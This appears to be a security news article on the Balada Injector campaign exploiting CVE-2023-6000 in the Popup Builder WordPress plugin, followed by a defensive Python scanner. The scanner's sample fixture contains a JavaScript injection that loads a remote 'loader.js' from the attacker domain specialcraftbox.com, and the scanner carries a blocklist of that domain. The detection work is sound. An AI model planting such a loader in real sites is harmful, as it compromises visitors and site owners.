January 23, 2024
More than 7,100 WordPress sites have been infected by the Balada Injector malware, according to Sucuri, the GoDaddy-owned website security company. The campaign exploits a vulnerability in the Popup Builder plugin, which has more than 200,000 active installs, to inject backdoors that redirect visitors of infected sites to bogus tech support pages, fraudulent lottery wins, and push notification scams.
The Balada Injector campaign runs in periodic attack waves, each weaponizing security flaws in WordPress plugins to inject backdoors that redirect visitors of infected sites to fraudulent pages. The malware has been active since 2017 and is estimated to have infiltrated no less than 1 million sites since then. Sucuri detected the latest wave on December 13, 2023, and identified the injections on over 7,100 sites.
The malware takes advantage of a high-severity flaw in Popup Builder (CVE-2023-6000, CVSS score: 8.8), a plugin with more than 200,000 active installs, that WPScan had publicly disclosed a day before the wave was detected. The issue, a stored cross-site scripting bug that lets unauthenticated attackers save arbitrary JavaScript in a popup, was addressed in version 4.2.3.
"When successfully exploited, this vulnerability [lets attackers] gain the same level of control over the website as the logged-in administrator they've targeted. This means they can essentially do anything the administrator can do, including installing any plugins they want and even creating new administrator accounts under their control," WPScan researcher Marc Montpas warned.
The main objective of the Balada Injector campaign is to insert a malicious JavaScript loader, hosted on specialcraftbox[.]com, into the infected website. That script is then used to take control of the site and to load additional JavaScript that performs the malicious redirects.
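As an added example (not code from Sucuri, WPScan, or the original article), the following Python script performs the two checks a site owner would want after reading the above: whether the installed Popup Builder version predates the 4.2.3 fix, and whether captured page HTML or the plugin's saved custom-JS settings reference the specialcraftbox[.]com loader. The injected snippet, the sample pages, the `assess` helper and the single-host blocklist are constructed for this example; a real scanner would take its indicators from a feed rather than one literal domain.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Release that fixed CVE-2023-6000, per the WPScan disclosure cited above.
PATCHED_VERSION = (4, 2, 3)

# Loader host named in the Sucuri report. Assumption for this example: a real
# scanner would pull a full indicator list from a feed instead of one literal.
SUSPICIOUS_DOMAINS = {"specialcraftbox.com"}

# Absolute or protocol-relative URL inside HTML, JS or a settings dump.
URL_RE = re.compile(r"""(?:https?:)?//[^\s"'<>)]+""")


def parse_version(text):
    """'4.2.3' -> (4, 2, 3); a suffix such as '-beta' is ignored."""
    m = re.match(r"\s*(\d+(?:\.\d+)*)", text)
    if not m:
        raise ValueError(f"unparseable version string: {text!r}")
    return tuple(int(part) for part in m.group(1).split("."))


def popup_builder_vulnerable(installed):
    """True when the installed Popup Builder predates the 4.2.3 fix."""
    version = parse_version(installed)
    version += (0,) * (len(PATCHED_VERSION) - len(version))  # 4.2 -> 4.2.0
    return version < PATCHED_VERSION


def _suspicious_host(url):
    """Match the host itself or any subdomain of a listed domain."""
    host = (urlsplit(url).hostname or "").lower()
    return any(host == d or host.endswith("." + d) for d in SUSPICIOUS_DOMAINS)


class _ScriptSrcCollector(HTMLParser):
    """Collects the src attribute of every <script> tag in a page."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            for name, value in attrs:
                if name == "src" and value:
                    self.sources.append(value)


def external_script_sources(html):
    parser = _ScriptSrcCollector()
    parser.feed(html)
    return parser.sources


def find_balada_indicators(text):
    """URLs in page HTML or plugin settings that point at a known loader host.

    Static <script src> tags are checked first; the URL regex then also catches
    loaders that are only assembled at runtime (document.createElement("script"))
    inside the popup's custom JS, which is where the injection is stored.
    """
    hits = []
    candidates = external_script_sources(text)
    candidates += [m.group(0) for m in URL_RE.finditer(text)]
    for url in candidates:
        if _suspicious_host(url) and url not in hits:
            hits.append(url)
    return hits


def assess(html, popup_builder_version):
    """Combine both checks into one verdict for a site (hypothetical helper)."""
    return {
        "plugin_vulnerable": popup_builder_vulnerable(popup_builder_version),
        "indicators": find_balada_indicators(html),
    }


# Constructed samples: an injected custom-JS block of the kind described
# above, embedded in a page, and a clean page running the patched plugin.
INJECTED_CUSTOM_JS = (
    'var s=document.createElement("script");'
    's.src="https://specialcraftbox.com/loader.js";'
    "document.head.appendChild(s);"
)
SAMPLE_INFECTED_HTML = (
    '<html><head><script src="https://cdn.example.org/jquery.js"></script></head>'
    "<body><script>" + INJECTED_CUSTOM_JS + "</script></body></html>"
)
SAMPLE_CLEAN_HTML = (
    '<html><head><script src="/wp-content/plugins/popup-builder/public/js/'
    'Popup.js?ver=4.2.3"></script></head><body></body></html>'
)

if __name__ == "__main__":
    print("infected:", assess(SAMPLE_INFECTED_HTML, "4.1.15"))
    print("clean:", assess(SAMPLE_CLEAN_HTML, "4.2.3"))
```

The version check alone is not sufficient: a site patched after the injection landed still carries the loader in its saved popup settings, which is why the indicator scan runs over the plugin's stored custom JS and not only over rendered pages.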
In conclusion, the Balada Injector malware has been active since 2017 and has infiltrated no less than 1 million sites since then. Its latest wave exploits a vulnerability in the Popup Builder plugin to inject backdoors that redirect visitors of infected sites to fraudulent pages. WordPress site owners should update Popup Builder to version 4.2.3 or later to close the entry point. Updating alone does not remove an injection that is already in place, so sites that ran an older version should also be checked for the injected loader script and for administrator accounts they did not create.